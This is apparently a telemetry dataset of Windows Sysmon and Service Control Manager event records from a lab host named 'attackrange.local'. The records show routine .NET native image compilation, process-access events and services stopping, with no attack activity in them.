{"EventTime":"2020-08-01 05:57:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6471,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:27.681\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0447-5F25-0000-0010A63A0C00}\r\nTargetProcessId: 4264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:27.681","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0447-5F25-0000-0010A63A0C00}","TargetProcessId":"4264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6472,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:29.884\r\nProcessGuid: {A837DB8D-0447-5F25-0000-0010A63A0C00}\r\nProcessId: 4264\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10a8-0\\System.Runtime.Serialization.dll\r\nCreationUtcTime: 2020-08-01 05:57:29.884","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:29.884","ProcessGuid":"{A837DB8D-0447-5F25-0000-0010A63A0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10a8-0\\System.Runtime.Serialization.dll","CreationUtcTime":"2020-08-01 05:57:29.884","EventReceivedTime":"2020-08-01 05:57:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6473,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:29.962\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0449-5F25-0000-00108D400C00}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:29.962","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0449-5F25-0000-00108D400C00}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6474,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:29.962\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0449-5F25-0000-00108D400C00}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:29.962","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0449-5F25-0000-00108D400C00}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6475,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:29.978\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0449-5F25-0000-00108D400C00}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:29.978","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0449-5F25-0000-00108D400C00}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6476,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:30.587\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-044A-5F25-0000-001009460C00}\r\nTargetProcessId: 3236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:30.587","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-044A-5F25-0000-001009460C00}","TargetProcessId":"3236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6477,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:30.587\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-044A-5F25-0000-001009460C00}\r\nTargetProcessId: 3236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:30.587","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-044A-5F25-0000-001009460C00}","TargetProcessId":"3236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6478,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:30.587\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-044A-5F25-0000-001009460C00}\r\nTargetProcessId: 3236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:30.587","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-044A-5F25-0000-001009460C00}","TargetProcessId":"3236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76865,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Windows Insider Service service entered the stopped state.","param1":"Windows Insider Service","param2":"stopped","EventReceivedTime":"2020-08-01 05:57:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76866,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the stopped state.","param1":"Update Orchestrator Service for Windows Update","param2":"stopped","EventReceivedTime":"2020-08-01 05:57:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76867,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Client License Service (ClipSVC) service entered the stopped state.","param1":"Client License Service (ClipSVC)","param2":"stopped","EventReceivedTime":"2020-08-01 05:57:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76868,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The AppX Deployment Service (AppXSVC) service entered the stopped state.","param1":"AppX Deployment Service (AppXSVC)","param2":"stopped","EventReceivedTime":"2020-08-01 05:57:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
